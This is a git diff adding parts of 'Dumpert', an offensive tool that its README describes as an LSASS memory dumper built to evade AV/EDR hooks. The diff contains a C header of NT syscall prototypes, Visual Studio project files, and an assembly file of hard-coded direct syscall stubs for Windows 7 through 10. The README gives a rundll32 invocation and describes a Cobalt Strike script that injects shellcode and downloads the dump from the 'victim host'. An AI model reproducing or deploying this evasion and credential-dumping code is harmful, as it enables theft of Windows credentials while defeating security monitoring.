--- /dev/null
+++ b/Dumpert/Outflank-Dumpert/Dumpert.h
@@ -0,0 +1,209 @@
+#pragma once
+
+#include <Windows.h>
+
+#define STATUS_SUCCESS 0
+#define OBJ_CASE_INSENSITIVE 0x00000040L
+#define FILE_OVERWRITE_IF 0x00000005
+#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
+typedef LONG KPRIORITY;
+
+#define InitializeObjectAttributes( i, o, a, r, s ) {    \
+      (i)->Length = sizeof( OBJECT_ATTRIBUTES );         \
+      (i)->RootDirectory = r;                            \
+      (i)->Attributes = a;                               \
+      (i)->ObjectName = o;                               \
+      (i)->SecurityDescriptor = s;                       \
+      (i)->SecurityQualityOfService = NULL;              \
+   }
+
+typedef struct _UNICODE_STRING {
+	USHORT Length;
+	USHORT MaximumLength;
+	PWSTR  Buffer;
+} UNICODE_STRING, *PUNICODE_STRING;
+
+typedef const UNICODE_STRING* PCUNICODE_STRING;
+
+typedef struct _WIN_VER_INFO {
+	WCHAR chOSMajorMinor[8];
+	DWORD dwBuildNumber;
+	UNICODE_STRING ProcName;
+	HANDLE hTargetPID;
+	LPCSTR lpApiCall;
+	INT SystemCall;
+} WIN_VER_INFO, *PWIN_VER_INFO;
+
+typedef struct _OBJECT_ATTRIBUTES {
+	ULONG Length;
+	HANDLE RootDirectory;
+	PUNICODE_STRING ObjectName;
+	ULONG Attributes;
+	PVOID SecurityDescriptor;
+	PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
+
+typedef struct _CLIENT_ID {
+	HANDLE UniqueProcess;
+	HANDLE UniqueThread;
+} CLIENT_ID, *PCLIENT_ID;
+
+typedef enum _SYSTEM_INFORMATION_CLASS {
+	SystemBasicInformation,
+	SystemProcessorInformation,
+	SystemPerformanceInformation,
+	SystemTimeOfDayInformation,
+	SystemPathInformation,
+	SystemProcessInformation,
+	SystemCallCountInformation,
+	SystemDeviceInformation,
+	SystemProcessorPerformanceInformation,
+	SystemFlagsInformation,
+	SystemCallTimeInformation,
+	SystemModuleInformation
+} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
+
+typedef struct _SYSTEM_PROCESSES {
+	ULONG NextEntryDelta;
+	ULONG ThreadCount;
+	ULONG Reserved1[6];
+	LARGE_INTEGER CreateTime;
+	LARGE_INTEGER UserTime;
+	LARGE_INTEGER KernelTime;
+	UNICODE_STRING ProcessName;
+	KPRIORITY BasePriority;
+	HANDLE ProcessId;
+	HANDLE InheritedFromProcessId;
+} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;
+
+typedef struct _IO_STATUS_BLOCK
+{
+	union
+	{
+		LONG Status;
+		PVOID Pointer;
+	};
+	ULONG Information;
+} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
+
+
+// Windows 7 SP1 / Server 2008 R2 specific Syscalls
+EXTERN_C NTSTATUS NtAllocateVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
+EXTERN_C NTSTATUS NtFreeVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
+EXTERN_C NTSTATUS ZwOpenProcess7SP1(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
+EXTERN_C NTSTATUS ZwClose7SP1(IN HANDLE KeyHandle);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation7SP1(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+EXTERN_C NTSTATUS NtCreateFile7SP1(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
+
+// Windows 8 / Server 2012 specific Syscalls
+EXTERN_C NTSTATUS NtAllocateVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
+EXTERN_C NTSTATUS NtFreeVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
+EXTERN_C NTSTATUS ZwOpenProcess80(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
+EXTERN_C NTSTATUS ZwClose80(IN HANDLE KeyHandle);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory80(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation80(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+EXTERN_C NTSTATUS NtCreateFile80(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
+
+
+// Windows 8.1 / Server 2012 R2 specific Syscalls
+EXTERN_C NTSTATUS NtAllocateVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
+EXTERN_C NTSTATUS NtFreeVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
+EXTERN_C NTSTATUS ZwOpenProcess81(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
+EXTERN_C NTSTATUS ZwClose81(IN HANDLE KeyHandle);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation81(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+EXTERN_C NTSTATUS NtCreateFile81(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
+
+
+// Windows 10 / Server 2016 specific Syscalls
+EXTERN_C NTSTATUS NtAllocateVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
+EXTERN_C NTSTATUS NtFreeVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
+EXTERN_C NTSTATUS ZwOpenProcess10(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
+EXTERN_C NTSTATUS ZwClose10(IN HANDLE KeyHandle);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+EXTERN_C NTSTATUS NtCreateFile10(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
+
+NTSTATUS(*NtAllocateVirtualMemory)(
+	HANDLE ProcessHandle,
+	PVOID *BaseAddress,
+	ULONG_PTR ZeroBits,
+	PSIZE_T RegionSize,
+	ULONG AllocationType,
+	ULONG Protect
+	);
+
+NTSTATUS(*NtFreeVirtualMemory)(
+	HANDLE ProcessHandle,
+	PVOID *BaseAddress,
+	IN OUT PSIZE_T RegionSize,
+	ULONG FreeType
+	);
+
+NTSTATUS(*ZwOpenProcess)(
+	PHANDLE ProcessHandle,
+	ACCESS_MASK DesiredAccess,
+	POBJECT_ATTRIBUTES ObjectAttributes,
+	PCLIENT_ID ClientId
+	);
+
+NTSTATUS(WINAPI *ZwQuerySystemInformation)(
+	SYSTEM_INFORMATION_CLASS SystemInformationClass,
+	PVOID SystemInformation,
+	ULONG SystemInformationLength,
+	PULONG ReturnLength
+	);
+
+NTSTATUS(*ZwWriteVirtualMemory)(
+	HANDLE hProcess,
+	PVOID lpBaseAddress,
+	PVOID lpBuffer,
+	SIZE_T NumberOfBytesToRead,
+	PSIZE_T NumberOfBytesRead
+	);
+
+NTSTATUS(*ZwProtectVirtualMemory)(
+	IN HANDLE ProcessHandle,
+	IN PVOID* BaseAddress,
+	IN SIZE_T* NumberOfBytesToProtect,
+	IN ULONG NewAccessProtection,
+	OUT PULONG OldAccessProtection
+	);
+
+NTSTATUS(*NtCreateFile)(
+	PHANDLE FileHandle,
+	ACCESS_MASK DesiredAccess,
+	POBJECT_ATTRIBUTES ObjectAttributes,
+	PIO_STATUS_BLOCK IoStatusBlock,
+	PLARGE_INTEGER AllocationSize,
+	ULONG FileAttributes,
+	ULONG ShareAccess,
+	ULONG CreateDisposition,
+	ULONG CreateOptions,
+	PVOID EaBuffer,
+	ULONG EaLength
+	);
+
+NTSTATUS(*ZwClose)(
+	IN HANDLE KeyHandle
+	);
+
+typedef NTSTATUS(NTAPI *_RtlGetVersion)(
+	LPOSVERSIONINFOEXW lpVersionInformation
+	);
+
+typedef void (WINAPI* _RtlInitUnicodeString)(
+	PUNICODE_STRING DestinationString,
+	PCWSTR SourceString
+	);
+
+typedef NTSYSAPI BOOLEAN(NTAPI *_RtlEqualUnicodeString)(
+	PUNICODE_STRING String1,
+	PCUNICODE_STRING String2,
+	BOOLEAN CaseInSensitive
+	);
diff --git a/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj b/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj
new file mode 100755
index 0000000..8e0f806
--- /dev/null
+++ b/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj
@@ -0,0 +1,130 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}</ProjectGuid>
+    <RootNamespace>OutflankDumpert</RootNamespace>
+    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
+    <ProjectName>Outflank-Dumpert</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="Dumpert.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="Dumpert.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="Syscalls.asm" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.filters b/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.filters
new file mode 100755
index 0000000..269c0e9
--- /dev/null
+++ b/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.filters
@@ -0,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="Syscalls.asm">
+      <Filter>Source Files</Filter>
+    </MASM>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="Dumpert.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="Dumpert.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.user b/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.user
new file mode 100755
index 0000000..6fb136b
--- /dev/null
+++ b/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.user
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup />
+</Project>
\ No newline at end of file
diff --git a/Dumpert/Outflank-Dumpert/Syscalls.asm b/Dumpert/Outflank-Dumpert/Syscalls.asm
new file mode 100755
index 0000000..86381b9
--- /dev/null
+++ b/Dumpert/Outflank-Dumpert/Syscalls.asm
@@ -0,0 +1,237 @@
+.code
+
+; Reference: https://j00ru.vexillium.org/syscalls/nt/64/
+
+; Windows 7 SP1 / Server 2008 R2 specific syscalls
+
+ZwOpenProcess7SP1 proc
+		mov r10, rcx
+		mov eax, 23h
+		syscall
+		ret
+ZwOpenProcess7SP1 endp
+
+ZwClose7SP1 proc
+		mov r10, rcx
+		mov eax, 0Ch
+		syscall
+		ret
+ZwClose7SP1 endp
+
+ZwWriteVirtualMemory7SP1 proc
+		mov r10, rcx
+		mov eax, 37h
+		syscall
+		ret
+ZwWriteVirtualMemory7SP1 endp
+
+ZwProtectVirtualMemory7SP1 proc
+		mov r10, rcx
+		mov eax, 4Dh
+		syscall
+		ret
+ZwProtectVirtualMemory7SP1 endp
+
+ZwQuerySystemInformation7SP1 proc
+		mov r10, rcx
+		mov eax, 33h
+		syscall
+		ret
+ZwQuerySystemInformation7SP1 endp
+
+NtAllocateVirtualMemory7SP1 proc
+		mov r10, rcx
+		mov eax, 15h
+		syscall
+		ret
+NtAllocateVirtualMemory7SP1 endp
+
+NtFreeVirtualMemory7SP1 proc
+		mov r10, rcx
+		mov eax, 1Bh
+		syscall
+		ret
+NtFreeVirtualMemory7SP1 endp
+
+NtCreateFile7SP1 proc
+		mov r10, rcx
+		mov eax, 52h
+		syscall
+		ret
+NtCreateFile7SP1 endp
+
+; Windows 8 / Server 2012 specific syscalls
+
+ZwOpenProcess80 proc
+		mov r10, rcx
+		mov eax, 24h
+		syscall
+		ret
+ZwOpenProcess80 endp
+
+ZwClose80 proc
+		mov r10, rcx
+		mov eax, 0Dh
+		syscall
+		ret
+ZwClose80 endp
+
+ZwWriteVirtualMemory80 proc
+		mov r10, rcx
+		mov eax, 38h
+		syscall
+		ret
+ZwWriteVirtualMemory80 endp
+
+ZwProtectVirtualMemory80 proc
+		mov r10, rcx
+		mov eax, 4Eh
+		syscall
+		ret
+ZwProtectVirtualMemory80 endp
+
+ZwQuerySystemInformation80 proc
+		mov r10, rcx
+		mov eax, 34h
+		syscall
+		ret
+ZwQuerySystemInformation80 endp
+
+NtAllocateVirtualMemory80 proc
+		mov r10, rcx
+		mov eax, 16h
+		syscall
+		ret
+NtAllocateVirtualMemory80 endp
+
+NtFreeVirtualMemory80 proc
+		mov r10, rcx
+		mov eax, 1Ch
+		syscall
+		ret
+NtFreeVirtualMemory80 endp
+
+NtCreateFile80 proc
+		mov r10, rcx
+		mov eax, 53h
+		syscall
+		ret
+NtCreateFile80 endp
+
+; Windows 8.1 / Server 2012 R2 specific syscalls
+
+ZwOpenProcess81 proc
+		mov r10, rcx
+		mov eax, 25h
+		syscall
+		ret
+ZwOpenProcess81 endp
+
+ZwClose81 proc
+		mov r10, rcx
+		mov eax, 0Eh
+		syscall
+		ret
+ZwClose81 endp
+
+ZwWriteVirtualMemory81 proc
+		mov r10, rcx
+		mov eax, 39h
+		syscall
+		ret
+ZwWriteVirtualMemory81 endp
+
+ZwProtectVirtualMemory81 proc
+		mov r10, rcx
+		mov eax, 4Fh
+		syscall
+		ret
+ZwProtectVirtualMemory81 endp
+
+ZwQuerySystemInformation81 proc
+		mov r10, rcx
+		mov eax, 35h
+		syscall
+		ret
+ZwQuerySystemInformation81 endp
+
+NtAllocateVirtualMemory81 proc
+		mov r10, rcx
+		mov eax, 17h
+		syscall
+		ret
+NtAllocateVirtualMemory81 endp
+
+NtFreeVirtualMemory81 proc
+		mov r10, rcx
+		mov eax, 1Dh
+		syscall
+		ret
+NtFreeVirtualMemory81 endp
+
+NtCreateFile81 proc
+		mov r10, rcx
+		mov eax, 54h
+		syscall
+		ret
+NtCreateFile81 endp
+
+; Windows 10 / Server 2016 specific syscalls
+ 
+ZwOpenProcess10 proc
+		mov r10, rcx
+		mov eax, 26h
+		syscall
+		ret
+ZwOpenProcess10 endp
+
+ZwClose10 proc
+		mov r10, rcx
+		mov eax, 0Fh
+		syscall
+		ret
+ZwClose10 endp
+
+ZwWriteVirtualMemory10 proc
+		mov r10, rcx
+		mov eax, 3Ah
+		syscall
+		ret
+ZwWriteVirtualMemory10 endp
+
+ZwProtectVirtualMemory10 proc
+		mov r10, rcx
+		mov eax, 50h
+		syscall
+		ret
+ZwProtectVirtualMemory10 endp
+
+ZwQuerySystemInformation10 proc
+		mov r10, rcx
+		mov eax, 36h
+		syscall
+		ret
+ZwQuerySystemInformation10 endp
+
+NtAllocateVirtualMemory10 proc
+		mov r10, rcx
+		mov eax, 18h
+		syscall
+		ret
+NtAllocateVirtualMemory10 endp
+
+NtFreeVirtualMemory10 proc
+		mov r10, rcx
+		mov eax, 1Eh
+		syscall
+		ret
+NtFreeVirtualMemory10 endp
+
+NtCreateFile10 proc
+		mov r10, rcx
+		mov eax, 55h
+		syscall
+		ret
+NtCreateFile10 endp
+
+end
diff --git a/README.md b/README.md
index 60ccd57..144d2f6 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,28 @@
-# Dumpert
-LSASS memory dumper using direct system calls and API unhooking
+### Dumpert, a LSASS memory dumper using direct system calls and API unhooking
+
+Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products.
+These tools demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike, 
+while not touching disk and evading AV/EDR monitored user-mode API calls.
+
+Two version of the code are included:
+
+An executable version and a DLL version of the code. 
+The DLL version can be run as follow:
+
+```
+rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump
+```
+
+Also a sRDI version of the code is provided, including an Cobalt Strike agressor script.
+This script uses shinject to inject the sRDI shellcode version of the dumpert DLL into the current process. 
+Then it waits a few seconds for the lsass minidump to finish and finally download the minidump file from the victim host.
+
+Compile instructions:
+
+```
+This project is written in C and assembly.
+You can use Visual Studio to compile it from source.
+```
+
+More info about the used techniques can be found on the following Blog:
+The sRDI code can be found here: https://github.com/monoxgas/sRDI
\ No newline at end of file